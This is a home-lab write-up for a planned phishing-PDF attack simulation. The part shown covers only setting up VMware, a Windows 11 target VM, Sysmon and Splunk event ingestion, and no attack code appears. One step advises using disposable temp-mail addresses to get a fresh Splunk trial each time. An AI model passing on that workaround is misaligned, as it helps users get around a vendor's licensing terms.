You Give HR A Bad PDF

Description

Established a home lab environment utilizing VMware to simulate an attack scenario between Windows and Kali Linux VMs. This setup shows scripts usage within Metasploit and real-time event monitoring through Sysmon and Splunk.

Prerequisites

VMware Workstation Pro Setup

VMware Workstation Pro is a type 2 hypervisor which serves to isolate and create a dedicated communication channel between the lab environments. The installation is as follows:

1. Download VMware Workstation Pro, that is hosted at: https://www.vmware.com/products/desktop-hypervisor/workstation-and-fusion.

2. Verify the executable’s integrity through the File Checksums. In this case, the SHA-256 and MD5 checksums are found at the installer page.

3. Open a PowerShell terminal within the same download’s location and execute:

    Get-FileHash <file-name>
   

   

   Therefore, the hash can be matched with the provided list.

   

4. Proceed with the installation of VMware Workstation Pro by accepting the End-User License Agreement.

   

5. There is a compatible setup, referring to Hyper-V or Device/Credential Guard being enabled.

   Hence, the virtual machines will be launched using the Windows Hypervisor Platform (WHP).

   

6. After setting the installation folder, tick the box Check for product updates on startup, to always ensure an up-to-date app version and mitigate risks like VM Escape.

   Also, joining the VMware Customer Experience Improvement Program is optional.

   

7. Finally, choose whether to create the shortcuts, then click Install. The VMware Workstation Pro interface should look like this:

   

Windows Setup

Windows 11 is the most recent Operating System developed by Microsoft. This is the host machine which will be targeted by Kali Linux.

1. Download the Windows Installation Media found at: https://www.microsoft.com/en-us/software-download/windows11.

2. During the install process, at the Choose which media to use section, select ISO file.

   

3. In VMware, click on Create a New Virtual Machine, then the Typical configuration and load the Windows.iso image.

   

4. At the Encryption Information section, choose to encrypt all the files and set a password that you store in a safe place, such a password manager, in the host machine.

   

   Also, select Store virtual disk as a single file in the Specify Disk Capacity section.

   

   Note: By default, the 64 GB of storage is not pre-allocated.

5. The summary will show the recommended hardware settings, except for one which must be configured manually, then click on Customize Hardware...

   

   The network adapter is set as NAT to share the host’s internet connection, and so it will eventually require a Windows Account. Therefore, select Host-only, which will be helpful to bypass the remaining setup.

   

6. Finish the machine creation and click on Power on this virtual machine.

7. During the configuration process, make sure to select I don't have a product key.

   

   In addition, select Windows 11 Pro, because of the RDP feature explained here: https://learn.microsoft.com/en-us/windows-server/remote/remote-desktop-services/clients/remote-desktop-supported-config.

   

8. During the setup, it will ask to connect to a network. To bypass this step, do Shift+F10 to open the CMD and execute the following command:

    oobe\bypassnro
   

   It will restart the machine and enable the I don't have internet option, select it and finish the setup.

   

9. After the Windows setup, ensure a smoother virtualization experience by going to the VM tab and select Install VMware Tools.

   

   It will load the drive and ask to execute the Run setup64.exe, click on it and follow the default options.

   

10. To have internet in the VM, go to the left bar, right click on the machine name and select Settings...

    

    And, in the Network Adapter section choose NAT to ensure the VM is not alongside the host network, but has its own through the host IP.

    

11. Finally, for future recovery of the fresh install, go to the VM tab, then click on Snapshot and Take Snapshot...

    

    Assign a name like “Fresh Install” and click Take Snapshot

    

Sysmon Setup

Sysmon is a service that monitors and logs system activity. This tool will be working on the Windows VM.

1. In the local machine, go to: https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon. Then, click on Download Sysmon

   

2. Sysmon can be installed with a configuration file. The balanced approach is found at: https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/sysmonconfig.xml. Right click and select Save as, then keep it on a memorable location.

   

3. Open the Downloads folder and extract the Sysmon.zip as follows:

   

   Then, drag and drop the sysmonconfig.xml into the generated sysmon folder. The content should look like this:

   

4. Open a PowerShell as an administrator within the same folder location and execute the following command to install Sysmon with the configuration file:

    .\Sysmon64.exe -i .\sysmonconfig.xml
   

   Then, proceed with the default installation process.

   

5. To check if Sysmon is up and running, press the Windows button to search Services, open it and then look for Sysmon64.

   

   Also, at the Event Viewer, Sysmon can be found via Applications and Services Logs -> Microsoft -> Windows -> Sysmon.

   

Splunk Setup

Splunk is a Security Information and Event Management (SIEM) tool for searching, monitoring and analyzing machines’ data. This solution will be working on the Windows VM.

1. In the local machine go to: https://www.splunk.com/en_us/download/splunk-enterprise.html. It requires an account to try the tool for 60 days.

   In this case, you may use a temporary email with: https://temp-mail.org/, which could serve as a workaround everytime Splunk is tested out.

   

2. Now, click on Download Now to get the Splunk installer.

   

   Also, the integrity of the executable can be checked in the same way as the third step of the VMware Setup. Retrieve the hash by clicking on More and then on Download SHA512 to verify your bits.

   

   It will download a file which can be opened with Notepad, and since the hash algorithm is SHA512, specify that in the PowerShell as follows:

    Get-FileHash <file-name> -Algorithm SHA512
   

   

3. Execute the Splunk installer and follow the default settings. It will setup Splunk in a Local System Account, which is the Windows VM.

   In case, Splunk needs to oversee data across multiple machines within an Active Directory domain, change to Domain Account.

   

4. Splunk is now installed and running on http://127.0.0.1:8000/

5. In order to log the system events data, below the Common tasks tab, click on Add data.

   

   Then, click on Monitor.

   

   Select Local Event Logs and choose Application, Security and System, which are standard for monitoring endpoints.

   

   Leave the default host value and click on Create a new index.

   

   The index can be called endpoint, which will be the Windows host’s searchable repository for ingested data.

   

   The Input Settings should look like the following.

   

   After that, click on Review and then on Submit.

   

   Now, the logs can be retrieved by querying the endpoint index, for example:

    source="WinEventLog:*" host="DESKTOP-I6QV43M" index="endpoint"
   

   

6. Install the Splunk Add-on for Sysmon by going to Apps -> Find More Apps.

   

   Then, look for Sysmon -> Click on Install.

   

7. To ensure that Sysmon logs are ingested into Splunk, go to C:\Program Files\Splunk\etc\system\local, and look for the file inputs.conf

   If the file is not present, then go back to system folder, click on the default folder, and copy the inputs.conf file into the local folder, as shown in the following image.

   

   Now, open the inputs.conf file, go to the bottom and paste the following configuration:

    [WinEventLog://Microsoft-Windows-Sysmon/Operational]
    index = endpoint
    disabled = false
    renderXml = true
    source = XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
   
    [WinEventLog://Microsoft-Windows-Windows Defender/Operational]
    index = endpoint
    disabled = false
    source = Microsoft-Windows-Windows Defender/Operational
    blacklist = 1000,1001,1002,1150,1151,2000
   
    [WinEventLog://Microsoft-Windows-PowerShell/Operational]
    index = endpoint
    disabled = false
    source = Microsoft-Windows-PowerShell/Operational
    blacklist = 4105,4106,40961,40962
   
    [WinEventLog://Application]
    index = endpoint
    disabled = false
   
    [WinEventLog://Security]
    index = endpoint
    disabled = false
   
    [WinEventLog://System]
    index = endpoint
    disabled = false
   

   There are blacklisted event IDs, which reduces the noise from routine scanning or operational information. The following are the details:

   • Windows Defender: Based on the Official Microsoft Defender Documentation.

     • 1000: An antimalware scan started.
     • 1001: An antimalware scan finished.
     • 1002: An antimalware scan was stopped before it finished.
     • 1150: The antimalware platform is running and in a healthy state.
     • 1151: Endpoint Protection client health report.
     • 2000: The antimalware definitions updated successfully.

   • Powershell: Based on S0cm0nkey’s Security Reference Guide and MyEventLog.

     • 4105: Script Block Execution start.
     • 4106: Script Block Execution stop.
     • 40961: PowerShell console is starting up.
     • 40962: PowerShell console is ready for user input.

     Note: Event ID 4104 refers to Script Block Logging, which leverages the hunting of suspicious Powershell commands. This is a better approach than relying on events 4105 and 4106, that may cause noisy logs. For further reference: Malware Archeology and Black Hills Information Security.

   After setting the mentioned configuration, restart the Splunkd Service, as shown in the image below.